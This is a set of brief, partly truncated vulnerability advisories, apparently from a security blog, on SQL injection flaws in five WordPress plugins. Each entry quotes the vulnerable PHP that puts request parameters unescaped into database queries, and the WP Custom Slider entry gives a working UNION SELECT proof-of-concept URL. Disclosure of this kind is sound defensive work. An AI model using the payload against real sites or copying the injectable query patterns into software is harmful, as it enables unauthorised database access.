WP Email Users – 1.4.1 – Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/wp-email-users/ Description: Type user access:  is accessible for any registered user $_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection File / Code: Path: /wp-content/plugin/wp-email-users/wp-email-user-ajax.php Line: 197 if($temp_sel_key == ‘select_temp’){ $myrows = $wpdb->get_results( “SELECT template_value FROM `”.$table_name.”` where id = $temp”); $data=$myrows[0]->template_value; } Proof of Concept: 1 – Login as regular user …

Wp custom slider 1.6.2 – Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/wp-custom-slider/ Description: Type user access: admin user. $_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection File / Code: Path: /wp-content/plugin/wp-custom-slider/customslider-ex-settings.php Line: 371 if(isset($_REQUEST[‘edit’])) { $id=$_REQUEST[‘edit’]; $query_pag_data=$wpdb->get_results(“select * from “.$wpdb->prefix.”customslider_images where id=$id”); ?> Proof of Concept: 1 – Login with admin user. 2 – Url with injection: http://target/wp-admin/options-general.php?page=custom_slider&showall=a&edit=0+UNION+SELECT+1,CONCAT(name,char(58),slug),3,4,5,6,7+FROM+wp_terms+WHERE+term_id=1 2 – Result:     Timeline: …

ZX_CSV Upload 1 Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/zx-csv-upload/ Description: Type user access: admin user. $_GET[‘id’] is not escaped. Url is accessible for every registered user. File / Code: Path: /wp-content/plugin/zx-csv-upload/zx_csv_home.php Line: 53 if(isset($_POST[‘rsltsbmt’])) { $table_name = $_POST[‘table_select’]; $rlfrom=$_POST[‘rsltfrom’]; $rlto=$_POST[‘rsltto’]; } … global $wpdb; //$tname=$wpdb->prefix.’currency’; $result = $wpdb->get_results( “SELECT * FROM $table_name limit $rlfrom,$rlto”); ?> Proof of Concept: 1 …

WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/wp-private-messages/ Description: Type user access: registered user. $_GET[‘id’] is not escaped. Url is accessible for every registered user. File / Code: Path: /wp-content/plugin/wp-private-messages/wpu_private_messages.php Line: 218 global $current_user, $wpulang; $id = $_GET[“id”]; $user = $_GET[“name”]; … $bf = “<tr><td class=\”left\”>”; $mid = “: </td><td>”; $af = “</td></tr>”; $pm = $wpdb->get_row(“SELECT * FROM …

Xtreme Locator Dealer Locator Plugin WordPress – Sql Injection

Homepage: https://wordpress.org/plugins/xtremelocator/ Description: Type user access: admins user. $_GET[‘id’] is not escaped. Is accessible for only admins user. File / Code: Path: /wp-content/plugins/xtremelocator/functions.xtremelocator.php Line: 112 if((isset($_GET[‘id’])||(isset($_POST[‘action’])&&$_POST[‘action’]==”add_field”))&&!isset($_POST[‘field_action’])){ if(isset($_GET[‘id’])){ $field=$wpdb->get_results(“SELECT * FROM `”.$wpdb->prefix.”xtremelocator_fields` WHERE id=”.$_GET[‘id’]); } include_once($xl_path.”/views/add_field.php”); }else{ Proof of Concept: 1 – Using url, sqli by get: 2 – Result:   Timeline: …